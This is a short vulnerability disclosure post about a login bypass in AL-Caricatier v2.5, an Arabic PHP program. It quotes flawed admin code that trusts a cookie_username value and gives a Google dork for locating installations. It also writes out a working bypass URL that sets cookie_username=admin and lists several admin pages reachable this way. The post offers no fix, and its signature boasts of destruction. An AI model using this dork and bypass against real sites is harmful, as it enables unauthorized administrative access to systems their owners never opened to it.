<p><br>Vulnerability in AL-Caricatier,V.2.5</p>
<p>Hello...<br>i found a vulneribility in an program called AL-Caricatier it's an </p>
<p>arabic program</p>
<p>site:<br><a href="http://www.php-ar.com/">http://www.php-ar.com</a></p>
<p>Vulnerability:<br>Login Bypass</p>
<p>GoogleDork:<br>inurl:view_caricatier. php</p>
<p>Vunlerability in an included file called ss.php which resides in </p>
<p>the admin directory...</p>
<p>if($cookie_username){<br>echo&quot;&quot;;<br>}else{<br>echo&quot;&lt;font face='tahoma' size='2'&gt;You Didn't Sign in لم تقم بتسجيل </p>
<p>الدخول&lt;/b&gt;&quot;;<br>echo&quot;&lt;meta http-equiv='Refresh' content='1; </p>
<p>url=admin_login.php'&gt;&quot;;<br>EXIT;<br>}</p>
<p>the admin directory is protected user and password but u can </p>
<p>bypass them by going to this link:</p>
<p><a href="http://www.victim.com/view_caricatier.php">www.victim.com/view_caricatier.php</a></p>
<p>To bypass:<br><a href="http://www.victim.com/admin/welcome.php?cookie_username=admin">www.victim.com/admin/welcome.php?cookie_username=admin</a><br>or any of the admin files instead of welcome.php<br>like :<br>add-flashFile.php
<br>caricatier_add.php<br>delete_cat.php</p>
<p>and u r in the admin interface...</p>
<p><br>&nbsp;</p><br clear="all"><br>-- <br>&reg;.....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF Genuises....&copy;